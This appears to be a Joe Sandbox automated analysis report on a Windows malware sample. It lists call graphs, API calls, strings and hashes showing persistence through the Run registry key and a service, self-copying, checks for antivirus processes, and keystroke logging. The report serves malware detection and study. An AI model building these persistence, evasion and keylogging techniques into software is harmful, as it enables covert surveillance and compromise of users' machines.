GetPEB 54266->54267 54267->54268 54269 24d99e8 GetPEB 54268->54269 54270 247ac48 54268->54270 54272 24d99fb GetPEB 54269->54272 54271 247ac53 54270->54271 54270->54272 54273 248f2b7 GetPEB 54271->54273 54272->54271 54274 247ac68 54273->54274 54275 247ac70 54274->54275 54276 24d9a24 GetPEB 54274->54276 54277 24d9a37 GetPEB 54275->54277 54286 247ac7b 54275->54286 54276->54277 54278 24d9a4a 54277->54278 54277->54286 54280 248f2b7 GetPEB 54278->54280 54279 248f2b7 GetPEB 54281 247ac80 54279->54281 54282 24d9a4f 54280->54282 54283 247ac8d 54281->54283 54284 24d9a81 GetPEB 54281->54284 54285 24d9a53 GetPEB 54282->54285 54282->54286 54287 248f2b7 GetPEB 54283->54287 54283->54290 54284->54283 54285->54286 54286->54279 54288 24d9a99 54287->54288 54289 24d9a9d GetPEB 54288->54289 54288->54290 54289->54290 54290->54221 54292 248baf6 54291->54292 54293 248bafa 54292->54293 54296 248bb3c 54292->54296 54295 248c197 20 API calls 54293->54295 54327 248bb1a 54295->54327 54298 248bbb3 54296->54298 54302 24e04cd 54296->54302 54430 24be187 LdrInitializeThunk 54296->54430 54300 248bbbd 54298->54300 54432 24be187 LdrInitializeThunk 54298->54432 54300->54302 54300->54327 54431 24be187 LdrInitializeThunk 54300->54431 54302->54327 54433 2523326 61 API calls 54302->54433 54303 248bc12 54303->54302 54304 248bc52 54303->54304 54305 248bc4d 54303->54305 54307 24e04e5 GetPEB 54304->54307 54309 248bc64 54304->54309 54306 248f2b7 GetPEB 54305->54306 54306->54304 54308 24e04f5 GetPEB 54307->54308 54310 24e0508 54308->54310 54320 248bc6f 54308->54320 54309->54308 54309->54320 54313 248f2b7 GetPEB 54310->54313 54311 248f2b7 GetPEB 54312 248bc74 54311->54312 54314 24e054b GetPEB 54312->54314 54315 248bc86 54312->54315 54316 24e051c 54313->54316 54317 24e055b 54314->54317 54315->54317 54318 248bc91 54315->54318 54316->54320 54321 24e0520 GetPEB 54316->54321 54322 248f2b7 GetPEB 54317->54322 54319 248f2b7 GetPEB 54318->54319 54324 248bc96 54319->54324 54320->54311 54321->54320 54323 24e0560 
54322->54323 54323->54324 54325 24e0564 GetPEB 54323->54325 54326 24e058f GetPEB 54324->54326 54324->54327 54325->54324 54326->54327 54327->54218 54329 24d3126 54328->54329 54434 24be187 LdrInitializeThunk 54329->54434 54331 24d313c 54331->54194 54334 247a737 54332->54334 54343 247a7f8 54332->54343 54333 248c197 20 API calls 54410 247a7bd 54333->54410 54336 247a796 54334->54336 54334->54343 54368 247a7c6 54334->54368 54335 247aaa1 54341 247aaae 54335->54341 54342 24d94d2 GetPEB 54335->54342 54337 248c197 20 API calls 54336->54337 54339 247a79e 54337->54339 54338 247a922 54340 24d97ae GetPEB 54338->54340 54367 247a92a 54338->54367 54339->54410 54435 247acb7 54339->54435 54348 24d97c1 GetPEB 54340->54348 54345 24d9530 54341->54345 54346 247aadd 54341->54346 54344 24d94de GetPEB 54342->54344 54352 24d94f8 54342->54352 54343->54335 54349 247a89d 54343->54349 54356 247aa30 54343->54356 54344->54352 54351 24d990c GetPEB 54345->54351 54345->54368 54345->54410 54355 247aaf8 54346->54355 54346->54368 54354 247a938 54348->54354 54349->54338 54349->54345 54349->54354 54358 248f2b7 GetPEB 54349->54358 54349->54368 54350 247a948 54360 248c197 20 API calls 54350->54360 54353 24d9918 GetPEB 54351->54353 54366 24d9932 54351->54366 54352->54341 54439 253b6ac 16 API calls 54352->54439 54353->54366 54354->54350 54354->54356 54359 24d97f5 GetPEB 54354->54359 54361 248f2b7 GetPEB 54355->54361 54357 248c197 20 API calls 54356->54357 54357->54350 54358->54338 54363 24d9800 GetPEB 54359->54363 54377 24d981a 54359->54377 54364 247a975 54360->54364 54365 247aafd 54361->54365 54363->54377 54369 248f2b7 GetPEB 54364->54369 54370 24d957f GetPEB 54365->54370 54371 247ab0a 54365->54371 54366->54368 54442 253b6ac 16 API calls 54366->54442 54367->54348 54367->54354 54368->54333 54372 247a97a 54369->54372 54374 24d9592 GetPEB 54370->54374 54373 247ab15 54371->54373 54371->54374 54375 247a987 54372->54375 54376 24d986c GetPEB 54372->54376 54385 247ab7e 54373->54385 54392 24d9617 GetPEB 54373->54392 
54398 24d9667 54373->54398 54374->54373 54379 24d987f GetPEB 54375->54379 54380 247a992 54375->54380 54376->54379 54377->54356 54441 253b6ac 16 API calls 54377->54441 54379->54380 54382 24d9894 54379->54382 54381 248f2b7 GetPEB 54380->54381 54384 247a997 54381->54384 54383 248f2b7 GetPEB 54382->54383 54387 24d9899 54383->54387 54388 24d98cd GetPEB 54384->54388 54389 247a9a4 54384->54389 54390 248f2b7 GetPEB 54385->54390 54387->54380 54391 24d989d GetPEB 54387->54391 54388->54389 54399 248f2b7 GetPEB 54389->54399 54389->54410 54393 247ab83 54390->54393 54391->54380 54395 24d9622 GetPEB 54392->54395 54401 24d963c 54392->54401 54396 24d96d6 GetPEB 54393->54396 54397 247ab8b 54393->54397 54394 248c197 20 API calls 54394->54385 54395->54401 54400 24d96e9 GetPEB 54396->54400 54397->54400 54412 247ab96 54397->54412 54398->54394 54399->54345 54403 24d96fe 54400->54403 54400->54412 54401->54398 54440 253b6ac 16 API calls 54401->54440 54402 248f2b7 GetPEB 54404 247ab9b 54402->54404 54405 248f2b7 GetPEB 54403->54405 54406 24d973d GetPEB 54404->54406 54407 247abad 54404->54407 54408 24d9703 54405->54408 54406->54407 54407->54410 54413 248f2b7 GetPEB 54407->54413 54411 24d9707 GetPEB 54408->54411 54408->54412 54410->54241 54411->54412 54412->54402 54414 24d9752 54413->54414 54414->54410 54415 24d9756 GetPEB 54414->54415 54415->54410 54419 248c1b4 54416->54419 54426 248c2f7 54416->54426 54417 24e0a4c GetPEB 54418 24e0a58 GetPEB 54417->54418 54417->54419 54418->54419 54419->54417 54421 248c2e3 54419->54421 54419->54426 54472 253b6ac 16 API calls 54419->54472 54422 24e0b0d GetPEB 54421->54422 54421->54426 54423 24e0b19 GetPEB 54422->54423 54424 24e0b33 54422->54424 54423->54424 54424->54426 54473 253b6ac 16 API calls 54424->54473 54426->54255 54428 248f2c4 54427->54428 54428->54203 54428->54204 54429->54264 54430->54298 54431->54303 54432->54298 54433->54327 54434->54331 54437 247acd0 54435->54437 54436 247ad34 54436->54410 54437->54436 54443 247ad51 54437->54443 54439->54341 
54440->54398 54441->54356 54442->54368 54447 247ad78 54443->54447 54453 247adc1 54443->54453 54444 24d9b3c GetPEB 54445 24d9b4f GetPEB 54444->54445 54446 247add9 54445->54446 54451 248f2b7 GetPEB 54446->54451 54448 24d9c21 GetPEB 54447->54448 54450 248f2b7 GetPEB 54447->54450 54452 247ae29 54447->54452 54449 24d9c2d GetPEB 54448->54449 54448->54452 54449->54452 54450->54453 54454 247adf9 54451->54454 54452->54437 54453->54444 54457 247adce 54453->54457 54455 247ae01 54454->54455 54456 24d9b76 GetPEB 54454->54456 54458 24d9b89 GetPEB 54455->54458 54467 247ae0c 54455->54467 54456->54458 54457->54445 54457->54446 54460 24d9b9c 54458->54460 54458->54467 54459 248f2b7 GetPEB 54461 247ae11 54459->54461 54462 248f2b7 GetPEB 54460->54462 54463 24d9bd5 GetPEB 54461->54463 54464 247ae1e 54461->54464 54465 24d9ba1 54462->54465 54463->54464 54464->54452 54468 248f2b7 GetPEB 54464->54468 54466 24d9ba5 GetPEB 54465->54466 54465->54467 54466->54467 54467->54459 54469 24d9bed 54468->54469 54470 24d9bf1 GetPEB 54469->54470 54471 24d9c00 54469->54471 54470->54471 54471->54448 54472->54419 54473->54426 54474 248f2d7 54475 248f37e 54474->54475 54476 248f355 54474->54476 54477 248f3c1 54475->54477 54478 248f3c6 GetPEB 54475->54478 54481 248f3a5 54475->54481 54477->54478 54479 248f3e8 54478->54479 54480 248f3d3 54478->54480 54485 248f3f2 GetPEB 54479->54485 54489 248f401 54479->54489 54480->54479 54482 248f3d8 GetPEB 54480->54482 54543 252b30f 26 API calls __startOneArgErrorHandling 54481->54543 54482->54479 54484 248f3ad 54485->54489 54486 248f5b7 54487 248f5fe GetPEB 54486->54487 54525 248f617 54486->54525 54487->54525 54488 24904b4 54490 2490501 GetPEB 54488->54490 54491 2490517 54488->54491 54489->54486 54489->54488 54515 248f49e 54489->54515 54490->54491 54496 248f2b7 GetPEB 54491->54496 54492 248fe9b 54494 248fece 54492->54494 54499 248feb7 54492->54499 54493 248fe71 54495 247a709 51 API calls 54493->54495 54498 248c197 20 API calls 54494->54498 54494->54515 54495->54515 54497 
249055b 54496->54497 54500 249055f GetPEB 54497->54500 54504 2490578 54497->54504 54498->54515 54501 247a709 51 API calls 54499->54501 54500->54504 54501->54515 54502 247abbd 11 API calls 54503 248f83f 54502->54503 54505 248f8a1 54503->54505 54506 248f843 54503->54506 54507 248f2b7 GetPEB 54504->54507 54511 248f8e6 GetPEB 54505->54511 54538 248f852 54505->54538 54509 247a709 51 API calls 54506->54509 54510 24905b0 54507->54510 54508 247abbd 11 API calls 54508->54538 54509->54538 54512 24905b4 GetPEB 54510->54512 54513 24905c7 54510->54513 54514 248f8f3 GetPEB 54511->54514 54531 248f90e 54511->54531 54512->54513 54518 24905d1 GetPEB 54513->54518 54534 24905f9 54513->54534 54514->54531 54516 247a709 51 API calls 54516->54538 54517 248fd75 54520 248fdbd GetPEB 54517->54520 54521 248fe1d 54517->54521 54523 24905e0 54518->54523 54518->54534 54519 248f2b7 GetPEB 54524 2490625 54519->54524 54526 248fdca GetPEB 54520->54526 54537 248fde5 54520->54537 54521->54492 54521->54493 54522 248fb1e GetPEB 54527 248fb2b GetPEB 54522->54527 54522->54538 54528 248f2b7 GetPEB 54523->54528 54529 2490629 GetPEB 54524->54529 54530 249063c 54524->54530 54525->54502 54525->54505 54525->54521 54525->54538 54526->54537 54527->54538 54532 24905e5 54528->54532 54529->54530 54530->54515 54536 248f2b7 GetPEB 54530->54536 54533 248f934 GetPEB 54531->54533 54532->54534 54535 24905e9 GetPEB 54532->54535 54533->54538 54534->54519 54535->54534 54540 249064b 54536->54540 54541 248fe0e GetPEB 54537->54541 54538->54508 54538->54516 54538->54517 54538->54521 54538->54522 54539 248fb6c GetPEB 54538->54539 54539->54538 54540->54515 54542 249064f GetPEB 54540->54542 54541->54521 54542->54515 54543->54484

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • GetInputState.USER32 ref: 100095B0
                                                                    • GetCurrentThreadId.KERNEL32 ref: 100095BB
                                                                    • PostThreadMessageA.USER32(00000000), ref: 100095C2
                                                                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 100095D2
                                                                      • Part of subcall function 10009563: CoInitialize.OLE32(00000000), ref: 1000956C
                                                                      • Part of subcall function 10009563: CoCreateGuid.OLE32(100095DD,?,100095DD), ref: 10009576
                                                                      • Part of subcall function 10009563: _snprintf.MSVCRT ref: 10009590
                                                                      • Part of subcall function 10009563: CoUninitialize.COMBASE(?,100095DD), ref: 10009599
                                                                    • wsprintfA.USER32 ref: 100095F0
                                                                    • GetVersionExA.KERNEL32(?), ref: 1000960C
                                                                    • GetVersionExA.KERNEL32(?), ref: 10009657
                                                                    • CreateThread.KERNEL32(00000000,00000000,100094E6,00000000,00000000,00000000), ref: 10009691
                                                                    • Sleep.KERNEL32(000F4240), ref: 100096A1
                                                                    • Sleep.KERNEL32(000001F4), ref: 100096DE
                                                                    • StartServiceCtrlDispatcherA.ADVAPI32(Rsjshd fzfgkqcm), ref: 100096EA
                                                                    • Sleep.KERNEL32(000003E8), ref: 100096F1
                                                                    • StartServiceCtrlDispatcherA.ADVAPI32(Rsjshd fzfgkqcm), ref: 100096F7
                                                                    • ExpandEnvironmentStringsA.KERNEL32(%ProgramFiles%\,?,00000104), ref: 1000970F
                                                                    • wsprintfA.USER32 ref: 1000972D
                                                                    • strlen.MSVCRT ref: 10009736
                                                                    • strlen.MSVCRT ref: 1000974F
                                                                    • strcat.MSVCRT(?,10012A68), ref: 10009768
                                                                    • strcat.MSVCRT(?,?,?,10012A68), ref: 10009778
                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,000000E1), ref: 1000978D
                                                                    • CopyFileA.KERNEL32(?,?,00000000), ref: 100097A2
                                                                    • Sleep.KERNEL32(000001F4), ref: 100097D6
                                                                    • CreateThread.KERNEL32(00000000,00000000,100093AC,00000000,00000000,00000000), ref: 10009837
                                                                    • wsprintfA.USER32 ref: 1000984D
                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1000985F
                                                                    • CopyFileA.KERNEL32(?,?,00000000), ref: 10009871
                                                                    • RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 1000988B
                                                                    • RegSetValueExA.ADVAPI32(?,100145A0,00000000,00000001,?,00000050), ref: 100098A6
                                                                    • RegCloseKey.ADVAPI32(?), ref: 100098AF
                                                                    • Sleep.KERNEL32(000F4240), ref: 100098BF
                                                                    • sprintf.MSVCRT ref: 100098F5
                                                                    • lstrlenA.KERNEL32(?), ref: 1000994E
                                                                    • wsprintfA.USER32 ref: 1000997B
                                                                    • memset.MSVCRT ref: 10009996
                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 100099A7
                                                                    • SHGetSpecialFolderPathA.SHELL32(00000000,?,0000002B,00000000), ref: 100099B8
                                                                    • lstrcatA.KERNEL32(?,10012A68), ref: 100099D0
                                                                    • lstrcatA.KERNEL32(?,?), ref: 100099DD
                                                                    • lstrcatA.KERNEL32(?,.exe), ref: 100099EB
                                                                    • MoveFileA.KERNEL32(?,?), ref: 100099FB
                                                                    • memset.MSVCRT ref: 10009A0A
                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 10009A1B
                                                                    • Sleep.KERNEL32(00000032), ref: 10009A29
                                                                    • ExitProcess.KERNEL32 ref: 100097E2
                                                                      • Part of subcall function 1000A053: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,75920F00,00000000,00000000,00000000,00000000), ref: 1000A06C
                                                                      • Part of subcall function 1000A053: _beginthreadex.MSVCRT ref: 1000A08A
                                                                      • Part of subcall function 1000A053: WaitForSingleObject.KERNEL32(?,000000FF), ref: 1000A09A
                                                                      • Part of subcall function 1000A053: CloseHandle.KERNEL32(?), ref: 1000A0A3
                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 10009A43
                                                                    • CloseHandle.KERNEL32(00000000), ref: 10009A4A
                                                                    • Sleep.KERNEL32(000F4240), ref: 10009A55
                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 10009A71
                                                                    • CloseHandle.KERNEL32(00000000), ref: 10009A78
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FileSleep$CloseCreateModuleNameThreadwsprintf$HandleObjectSingleWaitlstrcat$CopyCtrlDispatcherMessageServiceStartVersionmemsetstrcatstrlen$CurrentEnvironmentEventExitExpandFolderGuidInitializeInputMoveOpenPathPostProcessSpecialStateStringsUninitializeValue_beginthreadex_snprintflstrlensprintf
                                                                    • String ID: %$%ProgramFiles%\$.exe$Albmnt wohqpopu$C$C:\Windows\%s$Default$Dhttdfv.exe$Evyydy snigczyzhqwwiyebny$G$RavMonD.exe$Rsjshd fzfgkqcm$SOFTWARE\Microsoft\Windows\CurrentVersion\Run$\$c$e$n$n$o$o$p$r$s$t$u
                                                                    • API String ID: 4263603353-48054914
                                                                    • Opcode ID: 41af10e99478f0a1130f34c258fc11d6d2eafc1331e1bbe73cb7547be42e5fbc
                                                                    • Instruction ID: 22f1004e0bc85a243cc06aae3df85499ecf04fd817c36f45f7f7c6c6afa48464
                                                                    • Opcode Fuzzy Hash: 41af10e99478f0a1130f34c258fc11d6d2eafc1331e1bbe73cb7547be42e5fbc
                                                                    • Instruction Fuzzy Hash: 4BD17EB1C0425CBEFB10DBA48C89EEF7BBCEB05384F0041A5F605A6156DB759F888B61

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,759183C0,00000000,00000001), ref: 10007A1D
                                                                    • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 10007A34
                                                                    • GetProcAddress.KERNEL32(00000000,Process32First), ref: 10007A3E
                                                                    • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 10007A49
                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 10007A52
                                                                    • strstr.MSVCRT ref: 10007A75
                                                                    • Process32First.KERNEL32(00000064,?), ref: 10007A97
                                                                    • lstrcmpiA.KERNEL32(10013D40,?), ref: 10007AA7
                                                                    • Process32Next.KERNEL32(00000064,?), ref: 10007ABB
                                                                    • lstrcatA.KERNEL32(00000000,2E796172), ref: 10007AC6
                                                                    • lstrcatA.KERNEL32(00000000,10012C44), ref: 10007ACC
                                                                    • strstr.MSVCRT ref: 10007ADE
                                                                    • CloseHandle.KERNEL32(00000064), ref: 10007AED
                                                                    • lstrlenA.KERNEL32(00000000), ref: 10007AF6
                                                                    • lstrcpyA.KERNEL32(00000000,-/-), ref: 10007B0B
                                                                    • FreeLibrary.KERNEL32(00000000), ref: 10007B1A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AddressProc$LibraryProcess32lstrcatstrstr$CloseCreateFirstFreeHandleLoadNextSnapshotToolhelp32lstrcmpilstrcpylstrlen
                                                                    • String ID: -/-$CreateToolhelp32Snapshot$Mcshield.exe$Process32First$Process32Next$RavMonD.exe$kernel32.dll
                                                                    • API String ID: 3925129150-2766451689
                                                                    • Opcode ID: 52d0e8ba549a091069c9d0fe9cc9b3e36a9947ec2f7a311238eda45ef7237df1
                                                                    • Instruction ID: 26e7351027791b1232d400d7278115713019b26239143135cafc233efcac8e19
                                                                    • Opcode Fuzzy Hash: 52d0e8ba549a091069c9d0fe9cc9b3e36a9947ec2f7a311238eda45ef7237df1
                                                                    • Instruction Fuzzy Hash: 99F147B09052E9AADF61CF5189886CEBF75FB05740F90C1D8914A7F250CBBA8AC1CF94

                                                                    Control-flow Graph

                                                                    [Control-flow graph not reproduced: block graph of the function starting at 10004b31 (entry block 10004b31-10004b45, final block 10004d50-10004d52), with executed and non-executed blocks marked in the original report]
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: State$memset$AsyncSleeplstrlen
                                                                    • String ID: <BackSpace>$<Enter>
                                                                    • API String ID: 2124264721-3792472884
                                                                    • Opcode ID: 67ec3002a42366a28b666794439f13539bcae8029d356230e331e6032219c91b
                                                                    • Instruction ID: 0bb4407308772e355f15df9d5ce1b7e6b20cfbfe95ad1229b8953d6428a585f3
                                                                    • Opcode Fuzzy Hash: 67ec3002a42366a28b666794439f13539bcae8029d356230e331e6032219c91b
                                                                    • Instruction Fuzzy Hash: 3151A0F1901668ABFB10DFA08C48F8E7769EB803D1F1344A6E505A3149DB30DE418B6A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4521144245.000000000244C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0244C000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_244c000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: #$?
                                                                    • API String ID: 0-2193943856
                                                                    • Opcode ID: 9556bea370f36b6a6f2d737105d9cb40ff0e56c78c4db4436c228565dcb0ceb1
                                                                    • Instruction ID: 5d4837e4bf8cc260d1c993e164ab01f0d22f4318051767e947a4f19709c8e3dd
                                                                    • Opcode Fuzzy Hash: 9556bea370f36b6a6f2d737105d9cb40ff0e56c78c4db4436c228565dcb0ceb1
                                                                    • Instruction Fuzzy Hash: 6D13AE70A00655DFDF25CF69C4907AABFF2BF49304F1481AAD859AB381D774A886CF90
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4521144245.000000000244C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0244C000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_244c000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e765c198c796db5f36917cd26dde93d41df4f86f9496303949a514053bccd0ff
                                                                    • Instruction ID: 64ed138c74ec3a92dfc0ca092d6b4643c414fbf3ed8b3f973cbdc42094710290
                                                                    • Opcode Fuzzy Hash: e765c198c796db5f36917cd26dde93d41df4f86f9496303949a514053bccd0ff
                                                                    • Instruction Fuzzy Hash: 44E2D270A10255CFDB25DF68C490BAEBBF2FF49304F55819AD849AB781D734A886CF90
                                                                    APIs
                                                                    • LdrInitializeThunk.NTDLL(02506B22,000000FF,0000001C,0000000C,00008000,00000000,00000000,?,02506966,000000FF,00000000,00000000,0000000C,00001000,00000004,76F8D260), ref: 024BE211
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4521144245.000000000244C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0244C000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_244c000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: fe7a695d54c47184f6869f139371b110fb42ca037c2ef3b0bac4e3626bfa7998
                                                                    • Instruction ID: 5e4434a41b56dcab8794d83cf17c84d42851e9d31ee7a6c4386824e225b1f118
                                                                    • Opcode Fuzzy Hash: fe7a695d54c47184f6869f139371b110fb42ca037c2ef3b0bac4e3626bfa7998
                                                                    • Instruction Fuzzy Hash: 8C90023120188892D5107158C40474A000587D0301FBAC411A452465CDCA9589917161
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4521144245.000000000244C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0244C000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_244c000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID: `
                                                                    • API String ID: 2994545307-2679148245
                                                                    • Opcode ID: 15bc7b4a352d17b6c3338fcec568f626da830449a554b9b67442bb4acd5fab38
                                                                    • Instruction ID: 326864728ecd9f63443f5a546f1000cf7c26d22ae45bd2fec65772f30990f72f
                                                                    • Opcode Fuzzy Hash: 15bc7b4a352d17b6c3338fcec568f626da830449a554b9b67442bb4acd5fab38
                                                                    • Instruction Fuzzy Hash: 38612472204681AFD722DB68C854FAB77E9FF80714F09055AF9A5CB381C734D841CB62
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4521144245.000000000244C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0244C000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_244c000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 7ab46767922477e6e6069f4d234c0e46a9218f448f82e68b9a693029df00253b
                                                                    • Instruction ID: 494195886b5c341bb40c076f33aaea39c8e309164d5c3e00b881e84bb38266a2
                                                                    • Opcode Fuzzy Hash: 7ab46767922477e6e6069f4d234c0e46a9218f448f82e68b9a693029df00253b
                                                                    • Instruction Fuzzy Hash: 1E42FD752086819FC715DF29C494BABBBE6FF84708F04496EE8A6CB351D730D886CB52
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4521144245.000000000244C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0244C000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_244c000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 713b06d4c9637dcba6df182544027853be67856c55da38feffd0d598247cbe01
                                                                    • Instruction ID: c2e207169eedad01c1a7ba93e93263c1e1d7dd4731de811ffe8f85913c785611
                                                                    • Opcode Fuzzy Hash: 713b06d4c9637dcba6df182544027853be67856c55da38feffd0d598247cbe01
                                                                    • Instruction Fuzzy Hash: C3B10531610645AFEB16DB68C990BBFB7F6EF84308F14016AD552EB781DB70E942CB50
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4521144245.000000000244C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0244C000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_244c000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: cd369015ec5a4de55e1c9be4511f2a7df380c65403e721712cf3f6192da1ed95
                                                                    • Instruction ID: 01a5ece06b28cc8272d638a23e1ab968b1b021d67f1fad0be118effd23c17776
                                                                    • Opcode Fuzzy Hash: cd369015ec5a4de55e1c9be4511f2a7df380c65403e721712cf3f6192da1ed95
                                                                    • Instruction Fuzzy Hash: 34510331200A84EFD712DBA8C994FAABBF9FF05704F0505A6E591DB792D774E940CB50

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • wsprintfA.USER32 ref: 100082D3
                                                                    • GetLocalTime.KERNEL32(?), ref: 100082DC
                                                                    • wsprintfA.USER32 ref: 10008353
                                                                    • lstrlenA.KERNEL32(?,00000000), ref: 10008383
                                                                      • Part of subcall function 1000A87A: LoadLibraryA.KERNEL32(ADVAPI32.dll,?,75A78400,00000000,?,1000AF24,1000D480,000000FF,\Services\%s,10005404,80000002,?,00000072,00000001,00000065,00000000), ref: 1000A8A7
                                                                      • Part of subcall function 1000A87A: GetProcAddress.KERNEL32(00000000,RegCreateKeyExA), ref: 1000A8BE
                                                                      • Part of subcall function 1000A87A: GetProcAddress.KERNEL32(00000000,RegSetValueExA), ref: 1000A8C9
                                                                      • Part of subcall function 1000A87A: GetProcAddress.KERNEL32(00000000,RegDeleteKeyA), ref: 1000A8D4
                                                                      • Part of subcall function 1000A87A: GetProcAddress.KERNEL32(00000000,RegDeleteValueA), ref: 1000A8DF
                                                                      • Part of subcall function 1000A87A: GetProcAddress.KERNEL32(00000000,RegOpenKeyExA), ref: 1000A8EA
                                                                      • Part of subcall function 1000A87A: GetProcAddress.KERNEL32(00000000,RegCloseKey), ref: 1000A8F5
                                                                      • Part of subcall function 1000A87A: FreeLibrary.KERNEL32(00000000), ref: 1000A9E9
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AddressProc$Librarywsprintf$FreeLoadLocalTimelstrlen
                                                                    • String ID: %$%4d-%.2d-%.2d$C$C$E$M$MarkTime$Rsjshd fzfgkqcm$S$S$S$S$T$Y$\$\$\$c$e$e$e$e$i$l$n$n$o$o$r$r$r$r$s$s$t$t$t$u$v
                                                                    • API String ID: 3526305938-1197169607
                                                                    • Opcode ID: f2cbf916df55951652af7666c0576ac5b62ca3199c26ca39358bd8c707d0f92b
                                                                    • Instruction ID: 35ad1746f5ab4fd9615454abb90a141351abdf455c6bc105aa270bdc8869e458
                                                                    • Opcode Fuzzy Hash: f2cbf916df55951652af7666c0576ac5b62ca3199c26ca39358bd8c707d0f92b
